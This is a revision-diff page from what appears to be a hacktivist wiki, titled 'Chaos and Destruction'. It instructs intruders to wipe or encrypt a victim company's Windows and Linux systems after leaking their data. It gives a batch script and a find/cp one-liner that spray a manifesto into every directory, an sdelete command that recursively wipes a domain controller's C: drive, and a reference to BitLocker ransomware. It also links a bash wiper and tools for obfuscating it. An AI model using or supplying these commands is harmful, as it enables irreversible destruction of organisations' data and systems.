Chaos and Destruction: Difference between revisions
		
		
		
		Jump to navigation
		Jump to search
		
| m →Windows | |||
| Line 13: | Line 13: | ||
| * [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | * [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Guacamaya] (2:13:35 Wiping windows domain with [https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete sdelete] on the domain controller) <code>sdelete64.exe -accepteula -r -s C:\*</code> | ||
| === Encrypt Windows Domain === | === Encrypt Windows Domain === | ||
| [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker ) | [https://enlacehacktivista.org/index.php?title=Pronico#Video_Timeline Encrypt Windows Domain] (1:24:16 Wiping windows domain with Bitlocker) | ||
| * https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons | * https://www.blackhillsinfosec.com/bitlocker-ransomware-using-bitlocker-for-nefarious-reasons | ||
Revision as of 23:11, 26 July 2023
Companies have large networks consisting of both Windows and Linux systems, so if your end goal is not only leaking data to journalists but to also destroy your target then using a wiper will be the best way to achieve this goal, just make sure not to wipe critical services that may impact someones physical safety as demonstrated in Guacamaya's HackBack video, we want to destroy data, not harm human life.
Windows
Print your manifesto
@echo off
set "manifesto=C:\Users\Administrator\AppData\Local\Temp\manifesto.txt"
for /r "C:\" %%d in (.) do (
    xcopy "%manifesto%" "%%d\" /Y
)
Wiping Windows Domain
- Guacamaya (2:13:35 Wiping windows domain with sdelete on the domain controller) sdelete64.exe -accepteula -r -s C:\*
Encrypt Windows Domain
Encrypt Windows Domain (1:24:16 Wiping windows domain with Bitlocker)
Linux
Print your manifesto
- find ~/ -type d -exec cp -R /tmp/manifesto.txt {} \;
Wiping Linux System
Wipe a Linux system using a bash wiper.
- https://web.archive.org/web/20230724204753/https://pastebin.com/raw/1LcPihYr (source)
- A Node.js CLI tool and library to heavily obfuscate bash scripts: https://www.npmjs.com/package/bash-obfuscate
- Shell script compiler: https://packages.debian.org/bullseye/shc